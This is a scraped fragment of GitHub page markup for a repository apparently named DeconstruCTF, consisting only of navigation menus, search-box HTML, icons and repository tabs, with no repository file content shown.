</button> </div>
<nav class="mt-0 px-3 px-lg-0 mb-5 mb-lg-0" aria-label="Global"> <details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 py-3 border-0 no-wrap d-block d-lg-inline-block"> Why GitHub? <svg x="0px" y="0px" viewBox="0 0 14 8" xml:space="preserve" fill="none" class="icon-chevon-down-mktg position-absolute position-lg-relative"> <path d="M1,1l6.2,6L13,1"></path> </svg> </summary> <div class="dropdown-menu flex-auto rounded px-0 mt-0 pb-4 p-lg-4 position-relative position-lg-absolute left-0 left-lg-n4"> Features <span>→</span>
Mobile <span>→</span> Actions <span>→</span> Codespaces <span>→</span> Packages <span>→</span> Security <span>→</span> Code review <span>→</span> Issues <span>→</span> Integrations <span>→</span>
GitHub Sponsors <span>→</span> Customer stories<span>→</span> </div> </details> Team Enterprise
<details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 py-3 border-0 no-wrap d-block d-lg-inline-block"> Explore <svg x="0px" y="0px" viewBox="0 0 14 8" xml:space="preserve" fill="none" class="icon-chevon-down-mktg position-absolute position-lg-relative"> <path d="M1,1l6.2,6L13,1"></path> </svg> </summary>
<div class="dropdown-menu flex-auto rounded px-0 pt-2 pb-0 mt-0 pb-4 p-lg-4 position-relative position-lg-absolute left-0 left-lg-n4"> Explore GitHub <span>→</span>
<h4 class="color-fg-muted text-normal text-mono f5 mb-2 border-lg-top pt-lg-3">Learn and contribute</h4> Topics <span>→</span> Collections <span>→</span> Trending <span>→</span> Learning Lab <span>→</span> Open source guides <span>→</span>
<h4 class="color-fg-muted text-normal text-mono f5 mb-2 border-lg-top pt-lg-3">Connect with others</h4> The ReadME Project <span>→</span> Events <span>→</span> Community forum <span>→</span> GitHub Education <span>→</span> GitHub Stars program <span>→</span> </div> </details>
Marketplace
<details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 py-3 border-0 no-wrap d-block d-lg-inline-block"> Pricing <svg x="0px" y="0px" viewBox="0 0 14 8" xml:space="preserve" fill="none" class="icon-chevon-down-mktg position-absolute position-lg-relative"> <path d="M1,1l6.2,6L13,1"></path> </svg> </summary>
<div class="dropdown-menu flex-auto rounded px-0 pt-2 pb-4 mt-0 p-lg-4 position-relative position-lg-absolute left-0 left-lg-n4"> Plans <span>→</span>
Compare plans <span>→</span> Contact Sales <span>→</span>
Education <span>→</span> </div> </details> </nav>
<div class="d-lg-flex flex-items-center px-3 px-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-3 mb-lg-0">
<div class="header-search flex-auto js-site-search position-relative flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="412702904" data-scoped-search-url="/deepakdhayal/DeconstruCTF/search" data-owner-scoped-search-url="/users/deepakdhayal/search" data-unscoped-search-url="/search" action="/deepakdhayal/DeconstruCTF/search" accept-charset="UTF-8" method="get"> <label class="form-control input-sm header-search-wrapper p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control input-sm header-search-input jump-to-field js-jump-to-field js-site-search-focus js-site-search-field is-clearable" data-hotkey=s,/ name="q" data-test-selector="nav-search-input" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="YyBIkk/vdwetUZOAzYqi0ebqdld+srfO44Xkt+hiIXh3cDLqByBq43/gZ6Ys0lWY93PSUIt/QWm9bXm1AqbueQ==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg>
<div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<span>No suggested jump to results</span>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
</div> </label></form> </div></div>
</div>
<div class="position-relative mr-3 mb-4 mb-lg-0 d-inline-block"> Sign in </div>
Sign up </div> </div> </div></header>
</div>
<div id="start-of-content" class="show-on-focus"></div>
<div data-pjax-replace id="js-flash-container">
<template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class=" px-2" > <button class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> <div>{{ message }}</div>
</div></div> </template></div>
<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>
<div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" data-pjax-container >
<div id="repository-container-header" class="pt-3 hide-full-screen mb-5" style="background-color: var(--color-page-header-bg);" data-pjax-replace>
<div class="d-flex mb-3 px-3 px-md-4 px-lg-5">
<div class="flex-auto min-width-0 width-fit mr-3"> <h1 class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-icon-secondary mr-2"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <span> deepakdhayal </span> <span>/</span> DeconstruCTF
<span></span><span>Public</span></h1>
</div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell"> <path d="M8 16a2 2 0 001.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 008 16z"></path><path fill-rule="evenodd" d="M8 1.5A3.5 3.5 0 004.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.018.018 0 00-.003.01l.001.006c0 .002.002.004.004.006a.017.017 0 00.006.004l.007.001h10.964l.007-.001a.016.016 0 00.006-.004.016.016 0 00.004-.006l.001-.007a.017.017 0 00-.003-.01l-1.703-2.554a1.75 1.75 0 01-.294-.97V5A3.5 3.5 0 008 1.5zM3 5a5 5 0 0110 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.518 1.518 0 0113.482 13H2.518a1.518 1.518 0 01-1.263-2.36l1.703-2.554A.25.25 0 003 7.947V5z"></path></svg> Notifications
<div > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom mr-1"> <path fill-rule="evenodd" d="M8 .25a.75.75 0 01.673.418l1.882 3.815 4.21.612a.75.75 0 01.416 1.279l-3.046 2.97.719 4.192a.75.75 0 01-1.088.791L8 12.347l-3.766 1.98a.75.75 0 01-1.088-.79l.72-4.194L.818 6.374a.75.75 0 01.416-1.28l4.21-.611L7.327.668A.75.75 0 018 .25zm0 2.445L6.615 5.5a.75.75 0 01-.564.41l-3.097.45 2.24 2.184a.75.75 0 01.216.664l-.528 3.084 2.769-1.456a.75.75 0 01.698 0l2.77 1.456-.53-3.084a.75.75 0 01.216-.664l2.24-2.183-3.096-.45a.75.75 0 01-.564-.41L8 2.694v.001z"></path></svg> <span> Star</span>
0 </div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked"> <path fill-rule="evenodd" d="M5 3.25a.75.75 0 11-1.5 0 .75.75 0 011.5 0zm0 2.122a2.25 2.25 0 10-1.5 0v.878A2.25 2.25 0 005.75 8.5h1.5v2.128a2.251 2.251 0 101.5 0V8.5h1.5a2.25 2.25 0 002.25-2.25v-.878a2.25 2.25 0 10-1.5 0v.878a.75.75 0 01-.75.75h-4.5A.75.75 0 015 6.25v-.878zm3.75 7.378a.75.75 0 11-1.5 0 .75.75 0 011.5 0zm3-8.75a.75.75 0 100-1.5.75.75 0 000 1.5z"></path></svg> Fork
0
</div>
<div id="responsive-meta-container" data-pjax-replace></div>
<nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M4.72 3.22a.75.75 0 011.06 1.06L2.06 8l3.72 3.72a.75.75 0 11-1.06 1.06L.47 8.53a.75.75 0 010-1.06l4.25-4.25zm6.56 0a.75.75 0 10-1.06 1.06L13.94 8l-3.72 3.72a.75.75 0 101.06 1.06l4.25-4.25a.75.75 0 000-1.06l-4.25-4.25z"></path></svg> <span>Code</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path><path fill-rule="evenodd" d="M8 0a8 8 0 100 16A8 8 0 008 0zM1.5 8a6.5 6.5 0 1113 0 6.5 6.5 0 01-13 0z"></path></svg> <span>Issues</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M7.177 3.073L9.573.677A.25.25 0 0110 .854v4.792a.25.25 0 01-.427.177L7.177 3.427a.25.25 0 010-.354zM3.75 2.5a.75.75 0 100 1.5.75.75 0 000-1.5zm-2.25.75a2.25 2.25 0 113 2.122v5.256a2.251 2.251 0 11-1.5 0V5.372A2.25 2.25 0 011.5 3.25zM11 2.5h-1V4h1a1 1 0 011 1v5.628a2.251 2.251 0 101.5 0V5A2.5 2.5 0 0011 2.5zm1 10.25a.75.75 0 111.5 0 .75.75 0 01-1.5 0zM3.75 12a.75.75 0 100 1.5.75.75 0 000-1.5z"></path></svg> <span>Pull requests</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.5 8a6.5 6.5 0 1113 0 6.5 6.5 0 01-13 0zM8 0a8 8 0 100 16A8 8 0 008 0zM6.379 5.227A.25.25 0 006 5.442v5.117a.25.25 0 00.379.214l4.264-2.559a.25.25 0 000-.428L6.379 5.227z"></path></svg> <span>Actions</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <span>Projects</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-book UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M0 1.75A.75.75 0 01.75 1h4.253c1.227 0 2.317.59 3 1.501A3.744 3.744 0 0111.006 1h4.245a.75.75 0 01.75.75v10.5a.75.75 0 01-.75.75h-4.507a2.25 2.25 0 00-1.591.659l-.622.621a.75.75 0 01-1.06 0l-.622-.621A2.25 2.25 0 005.258 13H.75a.75.75 0 01-.75-.75V1.75zm8.755 3a2.25 2.25 0 012.25-2.25H14.5v9h-3.757c-.71 0-1.4.201-1.992.572l.004-7.322zm-1.504 7.324l.004-5.073-.002-2.253A2.25 2.25 0 005.003 2.5H1.5v9h3.757a3.75 3.75 0 011.994.574z"></path></svg> <span>Wiki</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M7.467.133a1.75 1.75 0 011.066 0l5.25 1.68A1.75 1.75 0 0115 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.7 1.7 0 01-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 011.217-1.667l5.25-1.68zm.61 1.429a.25.25 0 00-.153 0l-5.25 1.68a.25.25 0 00-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.2.2 0 00.154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.25.25 0 00-.174-.237l-5.25-1.68zM9 10.5a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.75a.75.75 0 10-1.5 0v3a.75.75 0 001.5 0v-3z"></path></svg> <span>Security</span> <include-fragment src="/deepakdhayal/DeconstruCTF/security/overall-count" accept="text/fragment+html"></include-fragment>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.5 1.75a.75.75 0 00-1.5 0v12.5c0 .414.336.75.75.75h14.5a.75.75 0 000-1.5H1.5V1.75zm14.28 2.53a.75.75 0 00-1.06-1.06L10 7.94 7.53 5.47a.75.75 0 00-1.06 0L3.22 8.72a.75.75 0 001.06 1.06L7 7.06l2.47 2.47a.75.75 0 001.06 0l5.25-5.25z"></path></svg> <span>Insights</span> <span></span>
<div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zM1.5 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zm13 0a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path></svg> <span>More</span> </div></summary> <div data-view-component="true"> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Wiki Security Insights
</details-menu></div></details></div></nav> </div>
<div class="clearfix new-discussion-timeline container-xl px-3 px-md-4 px-lg-5"> <div id="repo-content-pjax-container" class="repository-content " >
<div>
Permalink
<div class="d-flex flex-items-start flex-shrink-0 pb-3 flex-wrap flex-md-nowrap flex-justify-between flex-md-justify-start"> <div class="position-relative"> <details class="details-reset details-overlay mr-0 mb-0 " id="branch-select-menu"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path fill-rule="evenodd" d="M11.75 2.5a.75.75 0 100 1.5.75.75 0 000-1.5zm-2.25.75a2.25 2.25 0 113 2.122V6A2.5 2.5 0 0110 8.5H6a1 1 0 00-1 1v1.128a2.251 2.251 0 11-1.5 0V5.372a2.25 2.25 0 111.5 0v1.836A2.492 2.492 0 016 7h4a1 1 0 001-1v-.628A2.25 2.25 0 019.5 3.25zM4.25 12a.75.75 0 100 1.5.75.75 0 000-1.5zM3.5 3.25a.75.75 0 111.5 0 .75.75 0 01-1.5 0z"></path></svg> <span>Master</span> <span></span> </summary>
<div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg></button> </header>
<input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div>
<div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div>
